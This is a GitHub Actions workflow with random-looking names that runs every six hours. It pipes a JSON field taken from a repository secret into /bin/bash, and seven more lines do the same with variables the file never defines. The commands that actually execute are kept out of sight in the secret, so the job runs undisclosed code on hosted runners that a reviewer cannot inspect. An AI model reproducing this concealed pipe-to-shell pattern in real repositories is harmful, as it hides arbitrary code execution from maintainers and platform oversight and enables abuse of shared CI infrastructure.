name: maojiuyu1391

on:
  workflow_dispatch:
  schedule:
    - cron: '32 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maojiuyu1391
        env:
          gy53: ${{ secrets.gy53 }}
        run: |
          echo $gy53 | jq -r .cgsf75454 | /bin/bash
          echo $v29121 | jq -r .g75 | /bin/bash
          echo $ey110 | jq -r .b13 | /bin/bash
          echo $emxu16817 | jq -r .jlkao2548 | /bin/bash
          echo $gkhfu58 | jq -r .omb02 | /bin/bash
          echo $icljv280 | jq -r .jo947 | /bin/bash
          echo $vqulu9 | jq -r .cosin45637 | /bin/bash
          echo $zw0 | jq -r .uhg406 | /bin/bash

